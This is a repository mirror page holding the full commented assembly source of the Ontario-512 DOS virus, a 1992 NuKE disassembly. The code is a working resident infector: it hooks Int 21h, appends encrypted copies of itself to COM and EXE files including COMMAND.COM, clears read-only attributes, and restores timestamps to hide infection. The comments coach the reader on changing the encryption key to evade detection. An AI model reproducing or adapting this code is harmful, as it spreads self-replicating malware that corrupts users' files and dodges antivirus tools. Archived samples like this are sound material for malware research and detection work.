mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
297 lines
22 KiB
NASM
297 lines
22 KiB
NASM
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
|
;-* Ontario-512 Virus *-
|
|
;*- ~~~~~~~~~~~~~~~~~~~ -*
|
|
;-* Disassmembly by: Rock Steady/NuKE *-
|
|
;*- ~~~~~~~~~~~~~~~~ -*
|
|
;-* Notes: Resident EXE and COM infector, will infect COMMAND.COM *-
|
|
;*- ~~~~~~ on execution. 512 bytes file increase, memory decrease -*
|
|
;-* of about 2,048 bytes. Anti-debugging, encrypted virus. *-
|
|
;*- -*
|
|
;-* (c) Copy-Ya-Rite [NuKE] Viral Development Labs '92 *-
|
|
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
|
virus segment byte public
|
|
assume cs:virus, ds:virus
|
|
|
|
org 100h ;Guess its a COM File huh?
|
|
ont proc far
|
|
|
|
start:
|
|
jmp go4it ;Jump to beginning of the
|
|
db 1Dh ;Virus And start!
|
|
db 'fected [NuKE]''92', 0Dh, 0Ah, '$'
|
|
mov dx,0102h ;This is the small File the Virus
|
|
mov ah,09h ;is infected to! As you see it only
|
|
int 21h ;displays that messages and exits
|
|
int 20h ;Exit Command for COMs
|
|
go4it:
|
|
nop
|
|
call decrypt ;Get Decryption value & Decrypt viri
|
|
call virus_start ;Start the Virus!
|
|
ont endp
|
|
|
|
;---------------------------------------------------------------------;
|
|
; The Start of the Virus Code ;
|
|
;---------------------------------------------------------------------;
|
|
|
|
virus_start proc near
|
|
pop bp
|
|
sub bp,7
|
|
mov ax,0FFFFh ;Is Virus in Memory hooked on?
|
|
int 21h ;the Int 21h?
|
|
or ah,ah ;
|
|
jz bye_bye ;Yes it is... Quit then...
|
|
push ds
|
|
xor ax,ax
|
|
mov ds,ax
|
|
sub word ptr ds:413h,2
|
|
lds bx,dword ptr ds:84h
|
|
mov word ptr cs:[200h][bp],bx
|
|
mov word ptr cs:[202h][bp],ds
|
|
mov bx,es
|
|
dec bx
|
|
mov ds,bx
|
|
sub word ptr ds:3,80h
|
|
mov ax,ds:12h
|
|
sub ax,80h
|
|
mov ds:12h,ax
|
|
mov es,ax
|
|
push cs
|
|
pop ds
|
|
mov si,bp
|
|
xor di,di
|
|
mov cx,204h
|
|
cld
|
|
rep movsb
|
|
mov ds,cx
|
|
cli ;This is where we hook the
|
|
mov word ptr ds:84h,7Fh ;virus to the Int21h
|
|
mov word ptr ds:84h+2,ax
|
|
sti
|
|
mov ax,4BFFh
|
|
int 21h
|
|
pop ds
|
|
push ds
|
|
pop es
|
|
bye_bye:
|
|
or bp,bp
|
|
jz what
|
|
lea si,[bp+7Bh]
|
|
nop
|
|
mov di,offset ds:[100h]
|
|
push di
|
|
cld
|
|
movsw
|
|
movsw
|
|
retn
|
|
what:
|
|
mov ax,es
|
|
add cs:7dh,ax
|
|
;* jmp far ptr go4it7
|
|
virus_start endp
|
|
db 0EAh,0EBh, 15h, 49h, 6Eh
|
|
cmp ax,0FFFFh
|
|
jne new_21h
|
|
inc ax
|
|
iret
|
|
;---------------------------------------------------------------------;
|
|
; Interrupt 21h handler ;
|
|
;---------------------------------------------------------------------;
|
|
new_21h:
|
|
cmp ah,4Bh ;Test, is File beginning Executed!
|
|
jne leave_ok ;Nope! Call Int21!
|
|
cmp al,3 ;Overlay, beginning execute?
|
|
je leave_ok ;Yes! Leave it alone
|
|
cmp al,0FFh ;Virus testing to see if its alive?
|
|
jne do_it_man ;in memory?
|
|
push cs
|
|
pop ds
|
|
mov dx,1DDh
|
|
call infect
|
|
iret
|
|
do_it_man:
|
|
call infect ;Infect file dude...
|
|
leave_ok:
|
|
jmp dword ptr cs:[200h] ;Int21 handler..
|
|
|
|
;---------------------------------------------------------------------;
|
|
; Infection Routine for the Ontario Virus ;
|
|
;---------------------------------------------------------------------;
|
|
|
|
infect proc near
|
|
push es
|
|
push ds ;Save them not to fuck things up..
|
|
push dx
|
|
push cx
|
|
push bx
|
|
push ax
|
|
mov ax,4300h ;Here we get the file attribute
|
|
call int21 ;for file to be infected.
|
|
jc outta ;Bitch Error encountered. Quit!
|
|
test cl,1 ;Test if its Read-Only!
|
|
jz attrib_ok ;Ok, it ain't Read-Only Continue!
|
|
and cl,0FEh ;Set Read-Only to normal Attribs
|
|
mov ax,4301h ;Call Ints to do it...
|
|
call int21 ;Bingo! Done!
|
|
jc outta ;Error encountered? Split if yes!
|
|
attrib_ok:
|
|
mov ax,3D02h ;Open file for Read/Write
|
|
call int21 ;Call Interrupt to do it!
|
|
jnc open_ok ;no errors? Continue!
|
|
outta:
|
|
jmp go4it5 ;Hey, Split Man... Errors happened!
|
|
open_ok:
|
|
mov bx,ax ;BX=File Handle
|
|
push cs
|
|
pop ds
|
|
mov ax,5700h ;Get File's Date & Time
|
|
call int21 ;Do it!
|
|
mov word ptr ds:[204h],cx ;Save Time
|
|
mov word ptr ds:[206h],dx ;Save Date
|
|
mov dx,208h ;DX=Pointer
|
|
mov cx,1Bh ;CX=Number of Btyes
|
|
mov ah,3Fh ;Read From File
|
|
call int21 ;Do It!
|
|
jc go4it1 ;Errors? Quit if yes!
|
|
cmp word ptr ds:[208h],5A4Dh ;Check if files already
|
|
je go4it0 ;infected.
|
|
mov al,byte ptr ds:[209h] ;Com , Exes...
|
|
cmp al,byte ptr ds:[20Bh]
|
|
je go4it1
|
|
xor dx,dx
|
|
xor cx,cx
|
|
mov ax,4202h
|
|
call int21 ;Move File pointer to end of
|
|
jc go4it1 ;file to be infected.
|
|
cmp ax,0E000h ;File bigger than E000 bytes?
|
|
ja go4it1 ;Error...
|
|
push ax ;Save File Length
|
|
mov ax,word ptr ds:[208h]
|
|
mov ds:7bh,ax
|
|
mov ax,word ptr ds:[20Ah]
|
|
mov ds:7dh,ax
|
|
pop ax ;All this is, is a complex
|
|
sub ax,3 ;way to do "JMP"
|
|
mov byte ptr ds:[208h],0E9h ;
|
|
mov word ptr ds:[209h],ax
|
|
mov byte ptr ds:[20Bh],al
|
|
jmp short go4it3 ;File READY Infect it!
|
|
db 90h ;NOP me... detection string?
|
|
go4it0:
|
|
cmp word ptr ds:[21Ch],1
|
|
jne go4it2
|
|
go4it1:
|
|
jmp go4it4
|
|
go4it2:
|
|
mov ax,word ptr ds:[20Ch]
|
|
mov cx,200h
|
|
mul cx
|
|
push ax
|
|
push dx
|
|
mov cl,4
|
|
ror dx,cl
|
|
shr ax,cl
|
|
add ax,dx
|
|
sub ax,word ptr ds:[210h]
|
|
push ax
|
|
mov ax,word ptr ds:[21Ch]
|
|
mov ds:7bh,ax
|
|
mov ax,word ptr ds:[21Eh]
|
|
add ax,10h
|
|
mov ds:7dh,ax
|
|
pop ax ; This is continues with the
|
|
mov word ptr ds:[21Eh],ax ; above to put a JMP at the
|
|
mov word ptr ds:[21Ch],1 ; beginning of the file!
|
|
inc word ptr ds:[20Ch] ;
|
|
pop cx ;
|
|
pop dx ;
|
|
mov ax,4200h ;
|
|
call int21
|
|
jc go4it4
|
|
go4it3:
|
|
xor byte ptr ds:[1F8h],8 ;
|
|
xor ax,ax ; Theses Lines copy the
|
|
mov ds,ax ; virus code else where
|
|
mov al,ds:46Ch ; in memory to get it
|
|
push cs ; ready to infect the file
|
|
pop ds ; as we must encrypt it
|
|
push cs ; FIRST when we infect the
|
|
pop es ; file. so we'll encrypt
|
|
mov byte ptr ds:[1ECh],al ; this copy we're making!
|
|
xor si,si ; and append that to the
|
|
mov di,offset ds:[224h] ; end of the file
|
|
push di ;
|
|
mov cx,200h ;
|
|
cld ;
|
|
rep movsb
|
|
mov si,offset ds:[228h] ;Now Encrpyt that copy of the
|
|
call encrypt_decrypt ;virus we just made...
|
|
pop dx
|
|
mov cx,200h ;Write Virus to file!
|
|
mov ah,40h ;BX=Handle, CX=Bytes
|
|
call int21 ;DX=pointer to write buffer
|
|
jc go4it4 ;Duh? Check for errors!
|
|
xor cx,cx
|
|
xor dx,dx ;Now move pointer to beginning
|
|
mov ax,4200h ;of file.
|
|
call int21
|
|
jc go4it4 ;Duh? Check for errors!
|
|
mov dx,208h ;Write to file!
|
|
mov cx,1Bh ;CX=Bytes
|
|
mov ah,40h ;DX=pointes to buffer
|
|
call int21 ;Bah, HumBug
|
|
go4it4:
|
|
mov dx,word ptr ds:[206h] ;Leave no tracks...
|
|
mov cx,word ptr ds:[204h] ; puts back File TIME
|
|
mov ax,5701h ; and DATE! on file...
|
|
call int21 ;
|
|
mov ah,3Eh ;
|
|
call int21 ;Bah, HumBug...
|
|
go4it5:
|
|
pop ax ;Get lost...
|
|
pop bx
|
|
pop cx
|
|
pop dx
|
|
pop ds
|
|
pop es
|
|
retn
|
|
infect endp
|
|
|
|
;----------------------------------------------------------------------;
|
|
; The Original Interrupt 21h handler ;
|
|
;----------------------------------------------------------------------;
|
|
|
|
int21 proc near
|
|
pushf ;Fake an Int Call...
|
|
|
|
call dword ptr cs:[200h] ;Orignal Int21h Handler
|
|
retn
|
|
int21 endp
|
|
|
|
db 'C:\COMMAND.COM'
|
|
db 00h, 84h
|
|
|
|
;---------------------------------------------------------------------;
|
|
; The Simple, But VERY Effective Encryption Routine ;
|
|
;---------------------------------------------------------------------;
|
|
|
|
decrypt proc near
|
|
pop si
|
|
push si
|
|
mov al,byte ptr cs:[1E8h][si];INCRYPTION VALUE TO CHANGE!
|
|
encrypt_decrypt: ;and Virus will be UNDETECTABLE
|
|
mov cx,1E8h ; LENGTH OF VIRII! Change this!
|
|
loop_me: not al ; if you modief the virus!
|
|
xor cs:[si],al ;
|
|
inc si ;
|
|
loop loop_me ;
|
|
;
|
|
retn
|
|
decrypt endp
|
|
|
|
|
|
virus ends
|
|
end start
|
|
|
|
;------------------------------------------------------------------------
|
|
|